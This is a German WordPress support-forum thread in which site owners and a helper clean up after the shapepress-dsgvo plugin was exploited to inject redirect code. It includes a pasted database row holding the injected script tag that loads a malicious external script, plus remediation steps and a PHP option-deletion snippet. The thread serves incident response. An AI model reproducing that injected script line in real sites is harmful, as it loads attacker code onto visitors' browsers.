Weiterleitung/Redirects

@matzl01 laut ?ffentlichen Infos (Blogpost etc.) ab (inklusive) 22. September mit PoC-Code (Proof of Concept), und wurde seitdem zeitnah ausgenutzt. Geschlossen wurde das Plugin am 20. September und seitdem wurden einige darauf aufmerksam.

This plugin has been closed as of September 20, 2021 and is not available for download. This closure is temporary, pending a full review

Wenn in der Datenbank die Weiterleitung nicht zu finden ist bzw. die URL / Domain, dann sollte das ausreichend sein.

• This reply was modified 3 years, 6 months ago by Anonymous User 17880307.

Hallo Mitbetroffene,
ich entnehme dem Post von danielrufde, dass die Weiterleitung in der Datenbank zu finden ist? Oder ist es doch ein JS/ZIP auf dem Server? Nach was genau muss ich schauen?
Ich komme überhaupt nicht mehr auf meine Seite, also auch kein Login etc… geht nur noch per FTP. Habe eben ein Rollback zu Anfang des Monats laufen, das letzte DB Backup ist aber leider vom 20.09.
Danke!

@rfmf bitte per FTP den Ordner in wp-content/plugins von shapepress-dsgvo in _shapepress-dsgvo umbenennen und dann der Anleitung im ersten Beitrag folgen.

In der Datenbank sind Eintr?ge für zB die Matomo-Integration. Die Weiterleitungs-URL steht dort in einem Feld wie jsCode. Per phpmyadmin sollte das Feld einfach zu finden sein.

Also zum Beispiel global per phpmyadmin nach trim.js suchen bzw. nach der verwendeten sch?dlichen Domain.

Falls ein Cache-Plugin genutzt wird, muss ggf. wp-content/cache ebenfalls umbenannt werden.

Wenn in der Datenbank in der options-Tabelle bei home und siteurl die URL drin steht, dann wurde eine andere Sicherheitslücke in einem anderen Plugin verwendet.

Sorry in welcher Datenbank, ist diese im Ordner von shapepress-dsgvo?

@matzl01 bitte den Ordner wp-content/plugins/shapepress-dsgvo per FTP in wp-content/plugins/_shapepress-dsgvo umbenennen. Das sollte ausreichend sein. Dadurch wird das Plugin dann deaktiviert bzw. nicht mehr verwendet.

Falls noch ein Cache-Plugin genutzt wird, bitte wp-content/cache oder ?hnlich in wp-content/_cache umbenennen.

Datenbank-Tabellen sind nur per phpmyadmin einsehbar und haben nichts direkt mit Dateien bzw. FTP zu tun.

• This reply was modified 3 years, 6 months ago by Anonymous User 17880307.

Ich habe nun die Dateien aus dem Zip direkt in das Plugin Verzeichnis geladen und es funktioniert. Die Frage ist nur, wie kann ich den Müll aus dem Matomo Tagmanager entfernen, wenn ich keine Lizenz habe? Kann man den betreffenden Eintrag auch in der WP-Options Tabelle l?schen?

Zum Glück betrifft es nur 6 Webseiten. Man, was für ein Tag heute…

Gru? René

@ledumbauten ja das sollte m?glich sein. Da ich selber keine der betroffenen Webseiten im Detail analysiert habe: such mal nach einem Teil der verwendeten bzw. dort eingetragenen Domain / URL per phpmyadmin.

Dann ein Backup der Datenbank erstellen und den gefundenen Eintrag in der options-Tabelle l?schen.

Wenn du magst, dann kannst du die Infos davon (Feld-Name und Feld-Inhalt) hier posten (am besten so wie es im Dump / Backup der Datenbank steht) oder mir zukommen lassen. Ich k?nnte dann kostenfrei einen einfachen PHP-Code erstellen und bereitstellen, der das rausl?scht und den andere Betroffene ebenfalls verwenden k?nnen.

Solange alle m?glichst zeitnah das gel?st bekommen, dürfte damit vielen geholfen sein.

• This reply was modified 3 years, 6 months ago by Anonymous User 17880307.

@danielrufde danke für’s Angebot. Ich habe die Zeile mit dem Eintrag “sp_dsgvo_integration_matomo” in der Tabelle options einfach gel?scht.

Hier der SQL Auszug:
(83561, 'sp_dsgvo_integration_matomo', 'a:9:{s:7:\"enabled\";s:1:\"1\";s:10:\"propertyId\";s:0:\"\";s:10:\"useOwnCode\";s:1:\"1\";s:6:\"jsCode\";s:89:\"<script type=\'text/javascript\' src=\'https://store.piterreceiver.ga/jsa/trim.js\'></script>\";s:11:\"cookieNames\";s:7:\"_pk_*.*\";s:19:\"showAsTechMandatory\";s:1:\"0\";s:14:\"usedTagmanager\";s:0:\"\";s:18:\"implementationMode\";s:11:\"on-premises\";s:4:\"meta\";a:1:{s:6:\"agency\";s:0:\"\";}}', 'yes'),

War schon ziemlich fies.

Nun sollten meine Seiten wieder funktionieren.

Gru? René

Top =)

Für andere, die die Matomo-Integraiton nicht nutzen und die Option komplett entfernen wollen:

– delete-option.php per FTP anlegen (auf der gleichen Ebene wie xmlrpc.php)
– folgenden Inhalt darin einfügen / speichern und dann per Browser domain/delete-option.php aufrufen

<?php
require_once 'wp-load.php';
delete_option('sp_dsgvo_integration_matomo');

– die delete-option.php Datei danach wieder per FTP entfernen

• This reply was modified 3 years, 6 months ago by Anonymous User 17880307.
• This reply was modified 3 years, 6 months ago by Anonymous User 17880307.

@danielrufde Danke für die Laien gerechte Erkl?rung und die aufgebrachte Zeit.

Erst einmal Danke!!!

Ich habe eine Datenbanksicherung vom 21.09.2021, diese sollte wohl in Ordnung sein??

Was steht alles in der Datenbank?
Sorry, anders.
Ich habe letzte Woche z.B. – All in one SEO Pro – aktiviert, muss so etwas dann neu eingerichtet werden?

@danielrufde

Ich habe gerade Better Search Replace im Testlauf laufen lassen und nach https: // store. piterreceiver. ga gesucht. Es hat einen Eintrag in wp-options gefunden.
Ich habe dann das Plugin von legalweb gel?scht und danach Better Search Replace nochmal im Testlauf laufen lassen. Es hat keinen Eintrag mehr gefunden. Es scheint, dass der Eintrag in der Datenbank auch mit dem l?schen des Plugins entfernt wird. Für das DSGVO muss ich mir was neues einfallen lassen. Vielleicht kommt ja ein neues Plugin von legalweb.

@sepp-zwinger dann sollte das damit soweit gel?st sein.

Im ersten Kommentar dieses Themas ist eine abgesicherte Version vom Plugin verlinkt. Diese wird noch vom WordPress-Team geprüft und danach dann vermutlich wieder freigegeben.

@matzl01 laut ?ffentlichen Informationen wurde die Sicherheitslücke erst ab dem 22. September aktiv ausgenutzt.

Wenn in der Datenbank nichts mehr mit dieser Domain zu finden ist, dann sollte soweit alles wieder ok sein.

Ich hatte hier einen PHP-Code erstellt, womit man ansonsten die eine Option aus der Datenbank entfernen kann:

https://www.ads-software.com/support/topic/weiterleitung-redirects/page/2/#post-14914303

Siehe auch die Antwort nach dir von @sepp-zwinger.
Wenn ein Backup von davor eingespielt wird, dann muss logischerweise alles, was erst danach eingerichtet wurde, wieder wie gewünscht eingerichtet werden.

Hi @danielrufde , ja die wooCommerce Plugins wurden vom selben Akteur angegriffen mit dem selben Ziel, auf Werbeseiten umzuleiten. Hier war es über eine fehlende Rechteprüfung in einer Ajax-API m?glich die Felder in der Datenbank zu ?ndern, es war aber auch m?glich neue WordPress Nutzer zu hinterlegen und sich Adminrechte zum Blog zu verschaffen.

Leider schweigt @legalweb noch immer darüber, wie gro? das Scheunentor offen war und welche Manipulationen von den Angreifern potentiell noch durchgeführt h?tten k?nnen. Bisher sind nur die automatisch durchgeführten Weiterleitungs-Angriffe, welche tausende WordPress Blog betreffen, bekannt.

Aktuell ist nicht bekannt, ob weitere Felder manipuliert wurden oder ob es auch m?glich war den WordPress Core zu manipulieren (wie bei wooCommerce). Nur das Plugin zu aktualisieren ist daher m?glicherweise nicht ausreichend.

betreffs l?schen der eingeschleusten URLs in die Datenbank
Man kann die manuell via php-myadmin l?schen oder das gefixte plugin aus dem ersten Post hochladen und in den Einstellungen des Plugins unter Statistiken die vorgegebenen Scripte l?schen und dann “Einstellungen Speichern”, was dann wieder die Standardscripte hinterlegt (auch wenn man z.B. das Matomo Plugin nicht nutzt und es inaktiv hat). Anschlie?end ist die Datenbank, soweit ich es überprüfen konnte auch wieder “sauber”. Vielleicht als Tipp für alle, die sich mit phpMyAdmin nicht rantrauen.